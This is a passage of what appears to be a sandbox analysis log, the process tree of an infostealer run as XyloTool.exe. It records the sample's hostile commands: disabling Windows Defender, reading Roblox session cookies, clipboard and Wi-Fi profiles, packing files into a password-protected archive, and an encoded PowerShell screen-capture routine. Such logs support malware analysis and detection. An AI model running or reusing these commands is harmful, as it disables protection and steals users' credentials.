AQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA=4⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
PID:4924 -
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\35lrmyfg\35lrmyfg.cmdline"5⤵PID:8540
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeC:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES4A6E.tmp" "c:\Users\Admin\AppData\Local\Temp\35lrmyfg\CSCC988D1B75F8349DF868935A8C4D69627.TMP"6⤵PID:8624
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "tree /A /F"3⤵PID:8240
-
C:\Windows\system32\tree.comtree /A /F4⤵PID:8376
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "tree /A /F"3⤵PID:8400
-
C:\Windows\system32\tree.comtree /A /F4⤵PID:8472
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "tree /A /F"3⤵PID:8488
-
C:\Windows\system32\tree.comtree /A /F4⤵PID:8568
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "tree /A /F"3⤵PID:8580
-
C:\Windows\system32\tree.comtree /A /F4⤵PID:8668
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "tree /A /F"3⤵PID:8688
-
C:\Windows\system32\tree.comtree /A /F4⤵PID:8768
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"3⤵PID:8948
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY4⤵
- Suspicious behavior: EnumeratesProcesses
PID:9004 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"3⤵PID:9124
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY4⤵
- Suspicious behavior: EnumeratesProcesses
PID:9184 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "getmac"3⤵PID:8184
-
C:\Windows\system32\getmac.exegetmac4⤵PID:8332
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\_MEI48362\rar.exe a -r -hp"2006" "C:\Users\Admin\AppData\Local\Temp\bp001.zip" *"3⤵PID:8372
-
C:\Users\Admin\AppData\Local\Temp\_MEI48362\rar.exeC:\Users\Admin\AppData\Local\Temp\_MEI48362\rar.exe a -r -hp"2006" "C:\Users\Admin\AppData\Local\Temp\bp001.zip" *4⤵
- Executes dropped EXE
PID:8420 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "wmic os get Caption"3⤵PID:2576
-
C:\Windows\System32\Wbem\WMIC.exewmic os get Caption4⤵PID:7948
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "wmic computersystem get totalphysicalmemory"3⤵PID:5132
-
C:\Windows\System32\Wbem\WMIC.exewmic computersystem get totalphysicalmemory4⤵PID:6048
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"3⤵PID:8452
-
C:\Windows\System32\Wbem\WMIC.exewmic csproduct get uuid4⤵PID:8532
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER"3⤵PID:8568
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER4⤵
- Suspicious behavior: EnumeratesProcesses
PID:8632 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"3⤵PID:7464
-
C:\Windows\System32\Wbem\WMIC.exewmic path win32_VideoController get name4⤵
- Detects videocard installed
PID:3392 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault"3⤵PID:1628
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault4⤵
- Suspicious behavior: EnumeratesProcesses
PID:1524
-
C:\Users\Admin\Desktop\XyloTool.exe"C:\Users\Admin\Desktop\XyloTool.exe"1⤵
- Executes dropped EXE
PID:7888 -
C:\Users\Admin\Desktop\XyloTool.exe"C:\Users\Admin\Desktop\XyloTool.exe"2⤵
- Executes dropped EXE
- Loads dropped DLL
PID:3152 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\Desktop\XyloTool.exe'"3⤵PID:5488
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\Desktop\XyloTool.exe'4⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
PID:7024 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"3⤵PID:3052
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend4⤵
- Suspicious behavior: EnumeratesProcesses
PID:8924 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "tasklist /FO LIST"3⤵PID:1940
-
C:\Windows\system32\tasklist.exetasklist /FO LIST4⤵
- Enumerates processes with tasklist
PID:9016 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "tasklist /FO LIST"3⤵PID:8840
-
C:\Windows\system32\tasklist.exetasklist /FO LIST4⤵
- Enumerates processes with tasklist
PID:9076 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName"3⤵PID:9008
-
C:\Windows\System32\Wbem\WMIC.exeWMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName4⤵PID:7980
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "powershell Get-Clipboard"3⤵PID:9208
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Get-Clipboard4⤵
- Suspicious behavior: EnumeratesProcesses
PID:8272 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "tasklist /FO LIST"3⤵PID:3372
-
C:\Windows\system32\tasklist.exetasklist /FO LIST4⤵
- Enumerates processes with tasklist
PID:8352 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "tree /A /F"3⤵PID:9184
-
C:\Windows\system32\tree.comtree /A /F4⤵PID:4560
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "netsh wlan show profile"3⤵PID:9132
-
C:\Windows\system32\netsh.exenetsh wlan show profile4⤵
- Event Triggered Execution: Netsh Helper DLL
PID:2348 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "systeminfo"3⤵PID:4940
-
C:\Windows\system32\systeminfo.exesysteminfo4⤵
- Gathers system information
PID:5132 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA="3⤵PID:7292
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA=4⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
PID:7648 -
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\c2fwqu54\c2fwqu54.cmdline"5⤵PID:1184
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeC:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES8EBB.tmp" "c:\Users\Admin\AppData\Local\Temp\c2fwqu54\CSCF122D94BDFBC4FEFB711E6E59DA1EBB.TMP"6⤵PID:3276
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "tree /A /F"3⤵PID:7460
-
C:\Windows\system32\tree.comtree /A /F4⤵PID:8732
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "tree /A /F"3⤵PID:8456
-
C:\Windows\system32\tree.comtree /A /F4⤵PID:8208
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "tree /A /F"3⤵PID:8760
-
C:\Windows\system32\tree.comtree /A /F4⤵PID:1072
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "tree /A /F"3⤵PID:2312
-
C:\Windows\system32\tree.comtree /A /F4⤵PID:8796
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "tree /A /F"3⤵PID:6300
-
C:\Windows\system32\tree.comtree /A /F4⤵PID:6292
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"3⤵PID:7272
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY4⤵
- Suspicious behavior: EnumeratesProcesses
PID:8216 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "getmac"3⤵PID:2576
-
C:\Windows\system32\getmac.exegetmac4⤵PID:8016
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"3⤵PID:8316
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY4⤵
- Suspicious behavior: EnumeratesProcesses
PID:3124 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\_MEI78882\rar.exe a -r -hp"2006" "C:\Users\Admin\AppData\Local\Temp\IFuAT.zip" *"3⤵PID:9004
-
C:\Users\Admin\AppData\Local\Temp\_MEI78882\rar.exeC:\Users\Admin\AppData\Local\Temp\_MEI78882\rar.exe a -r -hp"2006" "C:\Users\Admin\AppData\Local\Temp\IFuAT.zip" *4⤵
- Executes dropped EXE
PID:7688 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "wmic os get Caption"3⤵PID:8324
-
C:\Windows\System32\Wbem\WMIC.exewmic os get Caption4⤵PID:8344
-
